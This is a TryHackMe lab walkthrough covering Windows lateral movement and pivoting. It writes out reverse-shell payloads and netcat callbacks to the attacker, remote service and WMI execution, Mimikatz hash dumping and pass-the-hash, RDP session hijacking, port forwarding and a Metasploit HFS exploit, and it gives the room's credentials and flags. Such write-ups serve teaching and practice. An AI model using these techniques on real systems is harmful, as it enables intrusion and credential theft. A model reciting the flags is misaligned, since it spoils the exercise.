Skip to content

Lateral Movement and Pivoting

  • 🌐 Website: TryHackMe
  • πŸ”₯ Level: Medium
  • πŸ–₯️ OS: Windows / Active Directory
  • πŸ”— Link: Lateral Movement and Pivoting

❓Question

After running the "flag.exe" file on t1_leonard.summers desktop on THMIIS, what is the flag?

πŸ“‹ Walkthrough

First, I configured DNS for the TryHackMe Active Directory environment and obtained the generated credentials:

Username: jennifer.wright
Password: Acknowledge1998

I connected to the jump host using SSH:

ssh za\\jennifer.wright@thmjmp2.za.tryhackme.com

This gives us access to THMJMP2 as Jennifer.

For this task, we are also given another set of credentials:

User: ZA.TRYHACKME.COM\t1_leonard.summers
Password: EZpass4ever

The goal is to move laterally from the jump host to THMIIS.

I generated a reverse shell payload specifically formatted to run as a Windows service:

msfvenom -p windows/shell/reverse_tcp \
-f exe-service \
LHOST=10.150.74.22 \
LPORT=4444 \
-o hackservice.exe

The exe-service format matters because the payload will later be executed through the Windows Service Control Manager.

I uploaded the payload to the remote administrative share:

smbclient \
-c 'put hackservice.exe' \
-U t1_leonard.summers \
-W ZA \
'//thmiis.za.tryhackme.com/admin$/' \
EZpass4ever

The ADMIN$ share normally maps to:

C:\Windows

so the payload is now available on the remote machine.

Next, I used Leonard's credentials with:

runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.150.74.22 4443"

The important part is:

/netonly

This means the process keeps the local identity of the current user, but when accessing remote resources it authenticates using Leonard's credentials.

So even if:

whoami

still shows Jennifer, remote operations are performed as Leonard.

Using that network authentication context, I created a service remotely:

sc.exe \\thmiis.za.tryhackme.com create HackService binPath= "%windir%\hackservice.exe" start= auto

Then I started it:

sc.exe \\thmiis.za.tryhackme.com start HackService

Leonard is not directly becoming SYSTEM here.

Instead, Leonard has enough permissions to control the remote Service Control Manager.

The attack chain is:

Jennifer
   ↓
runas /netonly with Leonard credentials
   ↓
Leonard authenticates to THMIIS
   ↓
Leonard can control the Service Control Manager
   ↓
Create a malicious Windows service
   ↓
Windows starts the service as LocalSystem
   ↓
Reverse shell as NT AUTHORITY\SYSTEM

Windows services normally run as:

NT AUTHORITY\SYSTEM

unless another service account is explicitly configured.

After obtaining access to THMIIS, I executed:

C:\Users\t1_leonard.summers\Desktop\flag.exe
Answer

THM{MOVING_WITH_SERVICES}


❓Question

After running the "flag.exe" file on t1_corine.waters desktop on THMIIS, what is the flag?

πŸ“‹ Walkthrough

For the second lateral movement technique, the provided credentials are:

User: ZA.TRYHACKME.COM\t1_corine.waters
Password: Korine.1994

This time, instead of abusing Windows services, we use WMI.

I generated a malicious MSI package:

msfvenom -p windows/shell/reverse_tcp \
-f msi \
LHOST=10.150.74.22 \
LPORT=4444 \
-o hack.msi

I uploaded it through SMB:

smbclient \
-c 'put hack.msi' \
-U t1_corine.waters \
-W ZA \
'//thmiis.za.tryhackme.com/admin$/' \
Korine.1994

The file is placed under:

C:\Windows\hack.msi

I then created a PowerShell credential object:

$username = 't1_corine.waters';
$password = 'Korine.1994';

$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;

$credential = New-Object System.Management.Automation.PSCredential `
    $username, $securePassword;

Next, I configured a CIM session using DCOM:

$Opt = New-CimSessionOption -Protocol DCOM

$Session = New-Cimsession `
    -ComputerName thmiis.za.tryhackme.com `
    -Credential $credential `
    -SessionOption $Opt `
    -ErrorAction Stop

Now I can invoke WMI methods remotely.

I used the Install method of Win32_Product to execute the MSI:

Invoke-CimMethod `
    -CimSession $Session `
    -ClassName Win32_Product `
    -MethodName Install `
    -Arguments @{
        PackageLocation = "C:\Windows\hack.msi";
        Options = "";
        AllUsers = $false
    }

The attack flow is:

Corine credentials
    ↓
Remote CIM/WMI session
    ↓
Win32_Product.Install
    ↓
Malicious MSI executed remotely
    ↓
Reverse shell on THMIIS

Once the shell arrives, I move to:

C:\Users\t1_corine.waters\Desktop

and list the directory:

dir

I find:

Flag.exe

Executing it:

Flag.exe

returns the flag.

Answer

THM{MOVING_WITH_WMI_4_FUN}


❓Question

What is the flag obtained from executing "flag.exe" on t1_toby.beck's desktop on THMIIS?

πŸ“‹ Walkthrough

For this task, the generated credentials are:

User: ZA.TRYHACKME.COM\t2_felicia.dean
Password: iLov3THM!

The objective here is to perform lateral movement using alternate authentication material.

Instead of recovering Toby's plaintext password, we want to obtain his NTLM hash from memory and use it directly.

I started Mimikatz and elevated its token:

token::elevate

The output shows:

SID name : NT AUTHORITY\SYSTEM

Mimikatz is now impersonating a SYSTEM token.

I tested access to protected credential material using:

lsadump::sam

and successfully obtained the local SAM information.

For example:

User : Administrator
Hash NTLM: 0b2571be7e75e3dbd169ca5352a2dad7

However, Toby is a domain user, so the local SAM is not the correct place to look.

Instead, I inspected active logon sessions:

sekurlsa::msv

Among the sessions, I found:

Authentication Id : 0 ; 534712
Session           : RemoteInteractive from 3
User Name         : t1_toby.beck
Domain            : ZA
Logon Server      : THMDC

The MSV credentials contain:

Username : t1_toby.beck
Domain   : ZA
NTLM     : 533f1bd576caa912bdb9da284bbc60fe
SHA1     : 8a65216442debb62a3258eea4fbcbadea40ccc38
DPAPI    : d9cd92937c7401805389fbb51260c45f

The interesting value is Toby's NTLM hash:

533f1bd576caa912bdb9da284bbc60fe

Before using Pass-the-Hash, I reverted the SYSTEM impersonation token:

token::revert

Then I launched a new process using Toby's NTLM hash:

sekurlsa::pth /user:t1_toby.beck /domain:za.tryhackme.com /ntlm:533f1bd576caa912bdb9da284bbc60fe /run:"c:\tools\nc64.exe -e cmd.exe 10.150.74.22 5555"

On my attacking machine:

rlwrap nc -lnvp 5555

I received a connection.

However:

whoami

returned:

za\t2_felicia.dean

Initially, this can look like the Pass-the-Hash failed.

It did not.

The process still has Felicia's local identity, while Toby's NTLM credentials are being used for network authentication.

Conceptually:

Local identity:
Felicia

Network identity:
Toby

To actually use Toby's network credentials, I connected to THMIIS using WinRM:

winrs.exe -r:THMIIS.za.tryhackme.com cmd

Inside the remote shell:

whoami

now returned:

za\t1_toby.beck

This happens because WinRM authenticates the remote connection using the NTLM material injected into the logon session.

The flow is:

Felicia
   ↓
sekurlsa::pth with Toby's NTLM hash
   ↓
New logon session containing Toby's authentication material
   ↓
WinRM connection to THMIIS
   ↓
Remote process created as Toby

I moved to:

C:\Users\t1_toby.beck\Desktop

and executed:

Flag.exe
Answer

THM{NO_PASSWORD_NEEDED}


❓Question

What flag did you get from hijacking t1_toby.beck's session on THMJMP2?

πŸ“‹ Walkthrough

For the RDP session hijacking task, the generated credentials were:

Username: t2_abigail.cox
Password: Vivian2008

I connected to THMJMP2 using RDP.

Once inside the graphical session, I opened cmd.exe as Administrator.

At this point, I was still logged in as:

ZA\t2_abigail.cox

but with elevated administrative privileges.

I then used PsExec to spawn a command prompt as SYSTEM.

After doing so:

whoami

returned:

nt authority\system

The distinction here is important:

Administrator != SYSTEM

Administrators are highly privileged users, but NT AUTHORITY\SYSTEM is the local operating system account used by many Windows services and generally has even more local privileges.

Once running as SYSTEM, I enumerated the existing Terminal Services sessions:

query user

or equivalently:

query session

This shows both active and disconnected RDP sessions.

Windows can preserve a user's desktop even after the RDP connection itself has been disconnected.

This means that if another user's session still exists, it may be possible to attach to it rather than authenticating again.

After identifying Toby's session ID, I used:

tscon 2 /dest:rdp

as instructed by the room.

The important thing here is that I did not authenticate as Toby.

Instead, I attached my existing RDP connection to an already authenticated session belonging to Toby.

The attack chain is:

Abigail
   ↓
Elevated command prompt
   ↓
PsExec
   ↓
NT AUTHORITY\SYSTEM
   ↓
Enumerate existing RDP sessions
   ↓
tscon
   ↓
Hijack Toby's existing RDP session

Once inside Toby's session, I retrieved the flag.

Answer

THM{NICE_WALLPAPER}


❓Question

What is the flag obtained from executing "flag.exe" on t1_thomas.moore's desktop on THMIIS?

πŸ“‹ Walkthrough

For the port forwarding section, the generated credentials were:

Username: leon.jennings
Password: Password!

I connected to the jump host:

ssh za\\leon.jennings@thmjmp2.za.tryhackme.com

The problem now is network reachability.

THMIIS exposes RDP on:

3389/tcp

but that service is not necessarily directly reachable from my attacking machine.

THMJMP2, however, can reach it.

This makes the jump host useful as a pivot.

I used socat to create a TCP forward:

socat TCP4-LISTEN:13389,fork TCP4:THMIIS.za.tryhackme.com:3389

This means:

THMJMP2:13389
     ↓
socat
     ↓
THMIIS:3389

From my attacking machine, I can therefore connect to:

THMJMP2:13389

and the traffic is forwarded to the RDP service on THMIIS.

I connected using:

xfreerdp \
/v:THMJMP2.za.tryhackme.com:13389 \
/u:t1_thomas.moore \
/p:MyPazzw3rd2020

Although the RDP client connects to THMJMP2, the actual RDP session is established with THMIIS.

Conceptually:

Attacker
   ↓
THMJMP2:13389
   ↓
socat TCP forwarding
   ↓
THMIIS:3389

Once logged in as Thomas, I executed:

flag.exe

from his desktop.

Answer

THM{SIGHT_BEYOND_SIGHT}


❓Question

What is the flag obtained using the Rejetto HFS exploit on THMDC?

πŸ“‹ Walkthrough

The final part of the room involves more complex port forwarding.

Some services on the internal network are not directly reachable from the attacker.

I created an SSH tunnel using:

ssh tunneluser@10.150.74.22 \
-R 8888:thmdc.za.tryhackme.com:80 \
-L '*:6666:127.0.0.1:6666' \
-L '*:7878:127.0.0.1:7878' \
-N

This command contains one remote forward and two local forwards.

The -N option tells SSH not to start an interactive shell, because the connection exists only to transport network traffic.


Remote forwarding

The following option:

-R 8888:thmdc.za.tryhackme.com:80

creates a remote forward.

Conceptually:

Attacker:8888
    ↓
SSH tunnel
    ↓
THMDC:80

This makes the internal web service on THMDC:80 accessible through the forwarded port.


Port 6666 forwarding

The following option:

-L *:6666:127.0.0.1:6666

is used so the compromised/internal host can reach the payload HTTP server running on the attacking side.

This is required by the Metasploit module because it needs to host additional payload content.


Port 7878 forwarding

The following option:

-L *:7878:127.0.0.1:7878

forwards the reverse shell callback through the tunnel.

Conceptually:

Internal target
     ↓
THMJMP2:7878
     ↓
SSH tunnel
     ↓
Attacker:7878

I selected the Rejetto HFS exploit in Metasploit:

use exploit/windows/http/rejetto_hfs_exec

I configured the payload:

set payload windows/shell_reverse_tcp

Then:

set lhost thmjmp2.za.tryhackme.com
set lport 7878

The reverse shell is instructed to connect to THMJMP2:7878, which is then forwarded back to the attacking machine.

The exploit also needs to host a payload, so I configured:

set srvhost 127.0.0.1
set srvport 6666

The target is reached through the forwarded port:

set rhost 127.0.0.1
set rport 8880

I initially made a typo:

ser rport 8888

which Metasploit rejected:

Unknown command: ser. Did you mean set?

After correcting the configuration, I launched:

exploit

Metasploit started the handler:

Started reverse TCP handler on 0.0.0.0:7878

and hosted the malicious payload:

http://thmjmp2.za.tryhackme.com:6666/...

Eventually:

Command shell session 1 opened

The returned shell was running on Windows.

I checked the current account:

whoami

which returned:

nt authority\local service

I listed the current directory:

dir

and found:

flag.txt
hfs.exe

Since pwd is a Unix/Linux command, it did not work in cmd.exe:

'pwd' is not recognized as an internal or external command

On Windows, commands such as:

cd

or:

echo %cd%

can be used instead.

Finally, I read the flag using:

type flag.txt
Answer

THM{FORWARDING_IT_ALL}